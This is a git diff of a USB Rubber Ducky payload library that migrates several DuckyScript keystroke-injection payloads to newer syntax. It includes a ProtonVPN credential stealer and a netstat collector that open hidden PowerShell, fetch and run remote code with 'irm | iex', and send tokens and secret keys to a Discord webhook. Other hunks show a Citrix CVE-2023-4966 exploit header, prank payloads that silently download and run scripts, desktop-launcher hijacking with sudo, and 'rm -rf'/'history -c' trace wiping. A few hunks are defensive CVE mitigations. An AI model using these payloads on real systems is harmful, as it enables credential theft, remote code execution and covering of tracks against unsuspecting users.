REM # Version : 1.0 | # Author : Aleff #
REM # Category : Credentials, Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Credentials, Exfiltration #
REM # | # Target : Windows 10-11 #
REM ################################################################### # #
###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like: In the config file you can find a lot information about the user like:
REM - UserUid - UserUid
REM - UserAccessToken - UserAccessToken
REM - UserRefreshToken - UserRefreshToken
REM - UserAuthenticationPublicKey - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey - UserCertificationServerPublicKey
REM - and so on... - and so on...
REM Then it cleans up traces of what you have done after. Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software) Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0 Version: 1.0
REM Category: Credentials, Exfiltration Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection Requirements: ProtonVPN user logged at least one time and internet connection
REM END_REM
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token> REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com DEFINE #WEBHOOK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r GUI r
DELAY 250 DELAY 250
DELETE DELETE
STRING powershell -w h -ep bypass $discord=' STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER

8
payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
View File

@ -41,17 +41,11 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
</a> </a>
<br>Github <br>Github
</td> </td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96"> <td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a> </a>
<br>Discord <br>Linkedin
</td> </td>
</tr> </tr>
</table> </table>

20
payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
View File

@ -1,12 +1,14 @@
REM ########################################################### REM_BLOCK
REM # | ###########################################################
REM # Title : Tree Structure Of The Operating System | # #
REM # Author : Aleff | # Title : Tree Structure Of The Operating System #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ########################################################### # #
###########################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet connection REM - Internet connection

113
payloads/library/exfiltration/Windows-netstat/payload.txt
View File

@ -1,45 +1,84 @@
REM ################################################################### REM_BLOCK
REM # | ###################################################################
REM # Title : Windows-netstat-to-Discord-Exfiltration | # #
REM # Author : Aleff | # Title : Windows-netstat-to-Discord-Exfiltration #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Net, Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Net, Exfiltration #
REM # | # Target : Windows 10-11 #
REM ################################################################### # #
###################################################################
REM Title: Windows-netstat-to-Discord-Exfiltration Title: Windows-netstat-to-Discord-Exfiltration
REM Author: Aleff Author: Aleff
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook. Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM Put 1 on the function that you want to active, else 0. Functions available: Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command) - default (simple 'netstat' command)
REM - routing_table $r - routing_table $r
REM - listening_canonical $lc - listening_canonical $lc
REM - listening_numerical $ln - listening_numerical $ln
REM - all_canonical $ac - all_canonical $ac
REM - all_numerical $an - all_numerical $an
REM - offload ot - offload ot
REM - proto $p "<protocol>" - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="". - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Target: Windows 10-11 (PowerShell) Target: Windows 10-11 (PowerShell)
REM Version: 1.0 Version: 1.0
REM Category: Net, Exfiltration Category: Net, Exfiltration
REM Requirements: Internet connection Requirements: Internet connection
REM END_REM
REM REQUIRED - Provide your Discord WEBHOOK REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token> DEFINE #WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE #PAYLOAD example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r GUI r
DELAY 250 DELAY 250
DELETE DELETE
STRING powershell -w h -ep bypass $discord=' STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER

39
payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
View File

@ -1,13 +1,14 @@
REM ############################################################################################# REM_BLOCK
REM # # #############################################################################################
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 # # #
REM # Author : Aleff # # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : incident-response # # Version : 1.0 #
REM # Target : Cisco IOS XE # # Category : incident-response #
REM # # # Target : Cisco IOS XE #
REM ############################################################################################# # #
#############################################################################################
END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME. REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh DEFINE #SCRIPT-NAME auto-check.sh
@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN END_STRINGLN
REM To avoid some bad DELAY I decided to use only one command row REM To avoid some bad DELAY I decided to use only one command row
REM Old script REM_BLOCK
REM STRINGLN sudo chmod +x #SCRIPT-NAME Old script:
REM DELAY 500 STRINGLN sudo chmod +x #SCRIPT-NAME
REM STRINGLN #SUDO-PSWD DELAY 500
REM DELAY 3000 STRINGLN #SUDO-PSWD
REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $ DELAY 3000
REM STRINGLN exit STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
STRINGLN exit
END_REM
REM Optimized script REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit

87
payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
View File

@ -1,34 +1,79 @@
REM ####################################################################################################################### REM_BLOCK
REM # | #######################################################################################################################
REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability | # #
REM # Author : Aleff | # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Incident Response | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Incident Response #
REM # | # Target : Windows 10/11 #
REM ####################################################################################################################### # #
#######################################################################################################################
REM PlugAndPlay <3 PlugAndPlay <3
REM Requirements: Requirements:
REM - ExecutionPolicy Bypass - ExecutionPolicy Bypass
REM Impact: Remote Code Execution Impact: Remote Code Execution
REM Max Severity: Important Max Severity: Important
REM Mitigation: Mitigation:
REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability. - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884). - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability. The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications. It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884 Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI x GUI x
DELAY 500 DELAY 500
STRING a STRING a

38
payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
View File

@ -1,25 +1,27 @@
REM ######################################################## REM_BLOCK
REM # | ########################################################
REM # Title : Defend Yourself From CVE-2023-23397 | # #
REM # Author : Aleff | # Title : Defend Yourself From CVE-2023-23397 #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Incident-Response | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Incident-Response #
REM # | # Target : Windows 10/11 #
REM ######################################################## # #
########################################################
REM PlugAndPlay <3 PlugAndPlay <3
REM Requirements: Requirements:
REM - ExecutionPolicy Bypass - ExecutionPolicy Bypass
REM - PayloadStudio 1.3.1 - PayloadStudio 1.3.1
REM Impacted Products: Impacted Products:
REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected. - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
REM Mitigation: Mitigation:
REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares. - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397 Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1 REM VERSION 1.1

20
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
View File

@ -1,12 +1,14 @@
REM ################################################################################ REM_BLOCK
REM # # ################################################################################
REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # # #
REM # Author : Aleff # # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : incident-response # # Version : 1.0 #
REM # Target : Citrix NetScaler ADV; NetScaler Gateway # # Category : incident-response #
REM # # # Target : Citrix NetScaler ADV; NetScaler Gateway #
REM ################################################################################ # #
################################################################################
END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example DEFINE #HOSTNAME example

80
payloads/library/prank/Alien Message From Computer/payload.txt
View File

@ -1,39 +1,79 @@
REM_BLOCK
####################################################
# #
# Title : Alien Message From Computer #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################################
REM #################################################### Plug-And-Play <3
REM # |
REM # Title : Alien Message From Computer |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Plug-And-Play <3 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM Requirements: REM_BLOCK DOCUMENTATION
REM - Internet Connection Windows fully passive OS Detection and passive Detect Ready
REM - ExecutionPolicy Bypass Includes its own passive detect ready.
REM - Python Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 1500 DELAY 1500
REM Create the file REM Create the file
STRING New-Item -Path ".\script.py" -ItemType "file" -Force; STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file REM Write the code into the file
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();" STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
ENTER
DELAY 1000 DELAY 1000
REM Execute the Python script REM Execute the Python script
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
REM Close the PowerShell REM Close the PowerShell
DELAY 1000 DELAY 1000

84
payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
View File

@ -1,36 +1,72 @@
REM ###################################################### REM_BLOCK
REM # | ######################################################
REM # Title : Change Wallpaper With Screenshot | # #
REM # Author : Aleff | # Title : Change Wallpaper With Screenshot #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Prank #
REM # | # Target : Windows 10-11 #
REM ###################################################### # #
######################################################
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRINGLN powershell
ENTER
DELAY 2000 DELAY 2000
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 2000 DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

79
payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
View File

@ -1,39 +1,58 @@
REM ########################################### REM_BLOCK
REM # | ###########################################
REM # Title : Change Desktop Wallpaper | # #
REM # Author : Aleff | # Title : Change Desktop Wallpaper #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.1 #
REM # Target : Linux (KDE based) | # Category : Prank #
REM # | # Target : Linux (KDE based) #
REM ########################################### # #
###########################################
REM Requirements: Requirements:
REM - Internet Connection - Internet Connection
END_REM
REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE #IMAGE_LINK example.com/IMAGE_NAME
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE #IMAGE_PATH="file://example.jpg"
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link STRINGLN wget #IMAGE_LINK
DEFINE IMAGE_LINK example.com/IMAGE_NAME
STRING wget
STRING IMAGE_LINK
ENTER
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE IMAGE_PATH="file://example.jpg"
REM It depends by the Internet Connection REM It depends by the Internet Connection
DELAY 2000 DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", " STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "#IMAGE_PATH")}'; rm -rf #IMAGE_PATH;history -c; exit;
STRING IMAGE_PATH
STRING ")}'
ENTER
DELAY 1000
STRING rm -rf
STRING IMAGE_PATH
STRING ;history -c; exit;
ENTER

77
payloads/library/prank/Change_The_App_That_Will_Be_Runned/payload.txt
View File

@ -1,46 +1,65 @@
REM ####################################################### REM_BLOCK
REM # | #######################################################
REM # Title : Change The App That Will Be Runned | # #
REM # Author : Aleff | # Title : Change The App That Will Be Runned #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Prank | # Version : 1.0 #
REM # Target : GNU/Linux (Debian based tested) | # Category : Prank #
REM # | # Target : GNU/Linux (Debian based tested) #
REM ####################################################### # #
#######################################################
REM Requirements:
REM - sudo permissions
Requirements:
- sudo permissions
END_REM
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example DEFINE #ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example DEFINE #ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
REM sudo permissions needed REM sudo permissions needed
DEFINE SUDO example DEFINE #SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell REM Open a shell
DELAY 2000
CTRL-ALT t CTRL-ALT t
DELAY 1000 DELAY 1000
STRING sudo sed -i '/^Exec=/s/.*/ STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
DELAY 500 DELAY 500
STRING SUDO STRINGLN #SUDO
ENTER
DELAY 4000 DELAY 4000
STRING sudo sed -i '/^Exec=/s/.*/ STRINGLN sudo sed -i '/^Exec=/s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/' #ORIGINAL_DESKTOP_FILE_NAME_2
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
DELAY 1000 DELAY 1000
ALT f4 ALT f4

75
payloads/library/prank/Continuos Print In Terminal/payload.txt
View File

@ -1,27 +1,68 @@
REM #################################################### REM_BLOCK
REM # | ####################################################
